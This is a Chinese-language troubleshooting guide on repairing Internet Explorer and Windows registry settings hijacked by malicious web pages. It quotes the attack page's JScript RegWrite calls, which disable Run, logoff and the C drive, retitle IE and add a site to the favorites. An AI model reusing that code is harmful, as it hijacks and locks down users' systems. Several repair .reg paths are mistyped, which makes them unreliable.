被惡意網站擊中的解決辦法——註冊表使用全攻略之六
一、註冊表被修改的原因及解決辦法
惡意網頁是含有有害代碼的ActiveX網頁檔案,這些廣告資訊的出現是因為瀏覽者的註冊表被惡意更改的結果。
1、IE預設串連首頁被修改
IE瀏覽器上方的標題列被改成"歡迎訪問……網站"的樣式,受到更改的登錄機碼目為:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通過修改"Start Page"的索引值,達到修改IE預設串連首頁的目的
①在Windows啟動後,點擊"開始"→"運行"菜單,在"開啟"欄中鍵入regedit,然後按"確定"鍵;
②展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,
在右半部分視窗中找到串值"Start Page" ,將索引值改為"about:blank"即可;
③同理,展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
在右半部分視窗中找到串值"Start Page",然後按②中所述方法處理。
④退出登錄編輯程式,重新啟動電腦,一切OK了!
特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設定修改好了,重啟以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器裡加了一個自運行程式,它會在系統啟動時將你的IE起始頁設成他們的網站。
解決辦法:運行登錄編輯程式regedit.exe,然後依次展開
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主鍵,然後將其下的registry.exe子鍵刪除,然後刪除自運行程式c:\Program Files\registry.exe,最後從IE選項中重新設定起始頁就好了。
2、篡改IE的預設頁
有些IE被改了起始頁後,即使設定了"使用預設頁"仍然無效,這是因為IE起始頁的預設頁也被篡改啦。就是以下登錄機碼被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
"Default_Page_URL"這個子鍵的索引值即起始頁的預設頁。
解決辦法:
將"Default_Page_UR"索引值中的那些篡改網站的網址改掉.
3、修改IE瀏覽器預設首頁,並鎖定設定項,禁止使用者更改回來。
主要是修改了註冊表中IE設定的下面這些索引值(DWORD值為1時為不可選):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"SecAddSites"=dword:1
解決辦法:將上面這些DWORD值改為"0"即可恢複功能。
4、IE的預設首頁灰色按扭不可選
由於HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的索引值被修改的緣故。原來的索引值為"0",被修改為"1"(即為灰色不可選狀態)。
解決辦法:將"homepage"的索引值改為"0"即可。
5、IE標題列被修改
在系統預設狀態下,是由應用程式本身來提供標題列的資訊,但也允許使用者自行在上述登錄機碼目中填加資訊,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的索引值改為其網站名或更多的廣告資訊,從而達到改變瀏覽者IE標題列的目的。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
解決辦法:
①在Windows啟動後,點擊"開始"→"運行"功能表項目,在"開啟"欄中鍵入regedit,然後按"確定"鍵;
②展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分視窗中找到串值"Window Title" ,將該串值刪除即可,或將Window Title的索引值改為"IE瀏覽器"等你喜歡的名字;
③同理,展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,按②中所述方法處理。
④退出登錄編輯程式,重新啟動電腦,運行IE,即可
6、IE右鍵菜單被修改
受到修改的登錄機碼目為:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被建立了網頁的廣告資訊,並由此在IE右鍵菜單中出現!
解決辦法:開啟註冊標編輯器,找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,刪除相關的廣告條文,注意不要把下載軟體FlashGet和Netants也刪除掉,這兩個是正常的。
7、IE預設搜尋引擎被修改
在IE瀏覽器的工具列中有一個搜尋引擎的工具按鈕,可以實現網路搜尋,被篡改後只要點擊那個搜尋工具按鈕就會連結到那個篡改網站。出現這種現象的原因是以下註冊表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
解決辦法:
運行登錄編輯程式,展開上述子鍵,將"CustomizeSearch"和"SearchAssistant"的索引值改為某個搜尋引擎的網址即可。
8、系統啟動時彈出對話方塊
受到更改的登錄機碼目為:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon在其下被建立了字串"LegalNoticeCaption"和"LegalNoticeText",其中"LegalNoticeCaption"是提示框的標題,"LegalNoticeText"是提示框的常值內容。它們的存在,得我們每次登陸到Windwos案頭前都出現一個提示視窗,顯示那些網頁的廣告資訊。
解決辦法:開啟登錄編輯程式,找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主鍵,在右邊視窗中找到"LegalNoticeCaption"和"LegalNoticeText"這兩個字串,刪除就可。
9、瀏覽網頁註冊表被禁用
這是由於註冊表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"被修改為"1"的緣故,將其索引值恢複為"0"即可。
解決辦法:用記事本程式建立以REG為尾碼名的檔案,將下面這些內容複寫在其中就可以了:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
10、瀏覽網頁開始菜單被修改
1)禁止"關閉系統" 2)禁止"運行"
3)禁止"登出" 4)隱藏C盤--你的C盤找不到了!
5)禁止使用登錄編輯程式regedit 6)禁止使用DOS程式
7)使系統無法進入"實模式" 8)禁止運行任何程式
註:以下是該網頁修改受害者的登錄機碼所用的招數
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
註:使受害者系統沒有“運行”項,這樣使用者就不能通過登錄編輯程式來修改該有害網頁對系統註冊表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
註:使受害者系統沒有“關閉系統”項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
註:使受害者系統沒有“登出”項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
註:使受害者系統沒有邏輯磁碟機C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY");
註:禁止運行所有的DOS應用程式;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
註:使系統不能啟動到“實模式”(傳統的DOS模式)下;
又註:進入該網頁,它還會修改以下的登錄機碼,使WINDOWS系統登入時顯示一個登入視窗(在MicroSoft網路使用者登入之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "嗚啦啦...");
註:這些代碼會使視窗的標題是“嗚啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "《嗚啦啦...》
註:上面一行是會在視窗中顯示出來的文字
註:下面兩行代碼修改註冊表,使受害者所有的IE視窗都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "嗚啦啦...");
註:到上面一行為止,完成了對受害者的註冊表的所有修改!
註:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
註:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", "http://www.findfeel.com")
受害使用者的修複方法:
1:對於Win9x使用者,建議在電腦啟動時按F8鍵,選擇到MS-DOS方式下,使用Scanreg/restore命令來恢複以前備份的、正常的註冊表。
2:對於Win2000使用者,把以下內容copy下來,存為unlock.reg檔案,選帶命令列的安全模式,用命令regedit unlock.reg匯入,如何重啟機器就OK了。
unlock.reg檔案內容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionWinlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"
11、IE中滑鼠右鍵失效
瀏覽網頁後在IE中滑鼠右鍵失效,點擊右鍵沒有任何反應!
12、查看""源檔案"菜單被禁用
在IE視窗中點擊"查看"→"源檔案","源檔案"菜單已經被禁用。具體的位置為:在註冊表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer下建子鍵"Restrictions",然後在"Restrictions"下面建立兩個DWORD值:"NoViewSource"和"NoBrowserContextMenu",並為這兩個DWORD值賦值為"1"。
在註冊表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,將兩個DWORD值:"NoViewSource"和"NoBrowserContextMenu"的索引值都改為了"1"。
解決辦法:
將以下內容另存新檔尾碼名為reg的註冊表檔案,如unlock.reg,雙擊unlock.reg匯入註冊表,重新運行IE就會恢複正常。
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
要特別注意的是,在你編製的註冊表檔案unlock.reg中,"REGEDIT4"一定要大寫,並且它的後面一定要空一行,還有,"REGEDIT4"中的"4"和"T"之間一定不能有空格,否則將前功盡棄!注意如果是Win2000或WinXP使用者,請將"REGEDIT4"改為Windows Registry Editor Version 5.00。
>
(出處:熱點網路)